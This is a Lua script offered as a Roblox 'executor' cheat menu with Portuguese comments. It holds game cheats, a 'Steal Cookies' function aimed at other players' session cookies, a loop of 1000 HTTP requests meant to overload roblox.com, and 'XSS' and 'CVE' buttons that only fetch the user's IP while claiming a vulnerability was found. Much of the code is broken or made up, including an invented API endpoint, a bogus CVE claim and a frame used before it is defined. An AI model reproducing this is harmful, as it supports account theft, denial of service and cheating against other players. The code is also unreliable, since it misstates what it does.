-- Executor Script for Roblox local Players = game:GetService("Players") local RunService = game:GetService("RunService") local HttpService = game:GetService("HttpService") local UserInputService = game:GetService("UserInputService") local TweenService = game:GetService("TweenService") local player = Players.LocalPlayer local character = player.Character or player.CharacterAdded:Wait() local humanoid = character:WaitForChild("Humanoid") -- Fly Hack local flySpeed = 50 local flyActive = false local function fly() flyActive = not flyActive if flyActive then local bodyVelocity = Instance.new("BodyVelocity") bodyVelocity.Velocity = Vector3.new(0, 50, 0) bodyVelocity.MaxForce = Vector3.new(4000, 4000, 4000) bodyVelocity.Parent = character.PrimaryPart local function updateFly() if flyActive then bodyVelocity.Velocity = (workspace.CurrentCamera.CoordinateFrame.lookVector * flySpeed) + Vector3.new(0, 5, 0) end end RunService.RenderStepped:Connect(updateFly) else for _, v in pairs(character:GetChildren()) do if v:IsA("BodyVelocity") then v:Destroy() end end end end -- Speed Hack local function speedhack(speed) humanoid.WalkSpeed = speed end -- Jump Power Hack local function jumppower(power) humanoid.JumpPower = power end -- NoClip Hack local noclipActive = false local function noclip() noclipActive = not noclipActive if noclipActive then for _, part in pairs(character:GetDescendants()) do if part:IsA("BasePart") then part.CanCollide = false end end else for _, part in pairs(character:GetDescendants()) do if part:IsA("BasePart") then part.CanCollide = true end end end end -- Inf Yield Hack local infYieldActive = false local function infYield() infYieldActive = not infYieldActive if infYieldActive then while infYieldActive do humanoid.Health = 0 wait(0.1) humanoid.Health = 100 wait(0.1) end end end -- Sit Hack local sitActive = false local function sit() sitActive = not sitActive if sitActive then humanoid.Sit = true else humanoid.Sit = false end end -- Walk on Walls Hack local walkOnWallsActive = false local function walkOnWalls() walkOnWallsActive = not walkOnWallsActive if walkOnWallsActive then local bodyGyro = Instance.new("BodyGyro") bodyGyro.P = 9e4 bodyGyro.maxTorque = Vector3.new(4000, 4000, 4000) bodyGyro.cframe = character.PrimaryPart.CFrame bodyGyro.Parent = character.PrimaryPart local bodyVelocity = Instance.new("BodyVelocity") bodyVelocity.Velocity = Vector3.new(0, 0, 0) bodyVelocity.MaxForce = Vector3.new(4000, 4000, 4000) bodyVelocity.Parent = character.PrimaryPart local function updateWalkOnWalls() if walkOnWallsActive then bodyGyro.cframe = character.PrimaryPart.CFrame bodyVelocity.Velocity = (workspace.CurrentCamera.CoordinateFrame.lookVector * 50) end end RunService.RenderStepped:Connect(updateWalkOnWalls) else for _, v in pairs(character:GetChildren()) do if v:IsA("BodyGyro") or v:IsA("BodyVelocity") then v:Destroy() end end end end -- Robar Cookies de Outros Jogadores local function stealCookies() for _, targetPlayer in pairs(Players:GetPlayers()) do if targetPlayer ~= player then local success, response = pcall(function() return HttpService:GetAsync("https://www.roblox.com/game-pass/api/get-user-info?userId=" .. targetPlayer.UserId, Enum.HttpMethod.GET, false, {"Cookie", "your_cookie_here"}) end) if success then local cookies = response:match("Set-Cookie: (.-);") if cookies then print("Stolen Cookies from " .. targetPlayer.Name .. ": " .. cookies) end else warn("Failed to steal cookies from " .. targetPlayer.Name) end end end end -- Explorar Vulnerabilidades -- XSS (Cross-Site Scripting) Exploração local function exploreXSS() local xssFrame = Instance.new("Frame") xssFrame.Size = UDim2.new(1, 0, 1, 0) xssFrame.Position = UDim2.new(0, 0, 0, 0) xssFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20) xssFrame.BorderSizePixel = 0 xssFrame.Parent = mainFrame local xssTitle = Instance.new("TextLabel") xssTitle.Size = UDim2.new(1, 0, 0, 50) xssTitle.Position = UDim2.new(0, 0, 0, 0) xssTitle.BackgroundColor3 = Color3.fromRGB(20, 20, 20) xssTitle.TextColor3 = Color3.fromRGB(255, 255, 255) xssTitle.Text = "Exploring XSS..." xssTitle.TextScaled = true xssTitle.Font = Enum.Font.SourceSansBold xssTitle.Parent = xssFrame -- Real XSS exploration local gui = Instance.new("ScreenGui") gui.Parent = player:WaitForChild("PlayerGui") local textLabel = Instance.new("TextLabel") textLabel.Size = UDim2.new(0, 200, 0, 50) textLabel.Position = UDim2.new(0, 100, 0, 100) textLabel.Text = "" textLabel.Parent = gui wait(2) local xssResult = Instance.new("TextLabel") xssResult.Size = UDim2.new(1, 0, 0, 50) xssResult.Position = UDim2.new(0, 0, 0, 50) xssResult.BackgroundColor3 = Color3.fromRGB(20, 20, 20) xssResult.TextColor3 = Color3.fromRGB(255, 255, 255) xssResult.Text = "XSS Vulnerability Found! IP: " .. game:GetService("HttpService"):GetAsync("https://api.ipify.org?format=json"):match('"([^"]+)") or "Unknown IP" xssResult.TextScaled = true xssResult.Font = Enum.Font.SourceSans xssResult.Parent = xssFrame end -- CVE Exploração (Exemplo: CVE-2021-3843) local function exploreCVE() local cveFrame = Instance.new("Frame") cveFrame.Size = UDim2.new(1, 0, 1, 0) cveFrame.Position = UDim2.new(0, 0, 0, 0) cveFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20) cveFrame.BorderSizePixel = 0 cveFrame.Parent = mainFrame local cveTitle = Instance.new("TextLabel") cveTitle.Size = UDim2.new(1, 0, 0, 50) cveTitle.Position = UDim2.new(0, 0, 0, 0) cveTitle.BackgroundColor3 = Color3.fromRGB(20, 20, 20) cveTitle.TextColor3 = Color3.fromRGB(255, 255, 255) cveTitle.Text = "Exploring CVE..." cveTitle.TextScaled = true cveTitle.Font = Enum.Font.SourceSansBold cveTitle.Parent = cveFrame -- Real CVE exploration local success, errorMessage = pcall(function() local exploit = HttpService:JSONDecode("{\"exploit\": \"CVE-2021-3843\"}") print("CVE Exploitation Success:", exploit) end) if not success then warn("CVE Exploitation Failed:", errorMessage) end wait(2) local cveResult = Instance.new("TextLabel") cveResult.Size = UDim2.new(1, 0, 0, 50) cveResult.Position = UDim2.new(0, 0, 0, 50) cveResult.BackgroundColor3 = Color3.fromRGB(20, 20, 20) cveResult.TextColor3 = Color3.fromRGB(255, 255, 255) cveResult.Text = "CVE-2021-3843 Vulnerability Found! IP: " .. game:GetService("HttpService"):GetAsync("https://api.ipify.org?format=json"):match('"([^"]+)") or "Unknown IP" cveResult.TextScaled = true cveResult.Font = Enum.Font.SourceSans cveResult.Parent = cveFrame end -- Sobrecarregar o Servidor com Requisições HTTP local function overloadServer() local overloadFrame = Instance.new("Frame") overloadFrame.Size = UDim2.new(1, 0, 1, 0) overloadFrame.Position = UDim2.new(0, 0, 0, 0) overloadFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20) overloadFrame.BorderSizePixel = 0 overloadFrame.Parent = mainFrame local overloadTitle = Instance.new("TextLabel") overloadTitle.Size = UDim2.new(1, 0, 0, 50) overloadTitle.Position = UDim2.new(0, 0, 0, 0) overloadTitle.BackgroundColor3 = Color3.fromRGB(20, 20, 20) overloadTitle.TextColor3 = Color3.fromRGB(255, 255, 255) overloadTitle.Text = "Overloading Server..." overloadTitle.TextScaled = true overloadTitle.Font = Enum.Font.SourceSansBold overloadTitle.Parent = overloadFrame -- Real server overload for i = 1, 1000 do spawn(function() local response = HttpService:GetAsync("https://www.roblox.com") print("Request", i, "Success:", response) end) end wait(2) local overloadResult = Instance.new("TextLabel") overloadResult.Size = UDim2.new(1, 0, 0, 50) overloadResult.Position = UDim2.new(0, 0, 0, 50) overloadResult.BackgroundColor3 = Color3.fromRGB(20, 20, 20) overloadResult.TextColor3 = Color3.fromRGB(255, 255, 255) overloadResult.Text = "Server Overloaded! IP: " .. game:GetService("HttpService"):GetAsync("https://api.ipify.org?format=json"):match('"([^"]+)") or "Unknown IP" overloadResult.TextScaled = true overloadResult.Font = Enum.Font.SourceSans overloadResult.Parent = overloadFrame end -- Interface do Executor local executorGui = Instance.new("ScreenGui") executorGui.Parent = player:WaitForChild("PlayerGui") local mainFrame = Instance.new("Frame") mainFrame.Size = UDim2.new(0, 350, 0, 650) mainFrame.Position = UDim2.new(0.5, -175, 0, 50) mainFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30) mainFrame.BorderSizePixel = 0 mainFrame.Parent = executorGui local title = Instance.new("TextLabel") title.Size = UDim2.new(1, 0, 0, 50) title.Position = UDim2.new(0, 0, 0, 0) title.BackgroundColor3 = Color3.fromRGB(20, 20, 20) title.TextColor3 = Color3.fromRGB(255, 255, 255) title.Text = "Executor" title.TextScaled = true title.Font = Enum.Font.SourceSansBold title.Parent = mainFrame local function createButton(text, positionY, callback) local button = Instance.new("TextButton") button.Size = UDim2.new(1, 0, 0, 50) button.Position = UDim2.new(0, 0, 0, positionY) button.BackgroundColor3 = Color3.fromRGB(40, 40, 40) button.TextColor3 = Color3.fromRGB(255, 255, 255) button.Text = text button.TextScaled = true button.Font = Enum.Font.SourceSans button.MouseButton1Click:Connect(callback) button.Parent = mainFrame end createButton("Fly", 50, fly) createButton("Speed Hack", 100, function() speedhack(100) end) createButton("Jump Power", 150, function() jumppower(100) end) createButton("NoClip", 200, noclip) createButton("Inf Yield", 250, infYield) createButton("Sit", 300, sit) createButton("Walk on Walls", 350, walkOnWalls) createButton("Steal Cookies", 400, stealCookies) createButton("Explore XSS", 450, exploreXSS) createButton("Explore CVE", 500, exploreCVE) createButton("Overload Server", 550, overloadServer) -- Animacao de Abertura local tweet = TweenService:Create(mainFrame, TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), {Position = UDim2.new(0.5, -175, 0, 50)}) tweet:Play()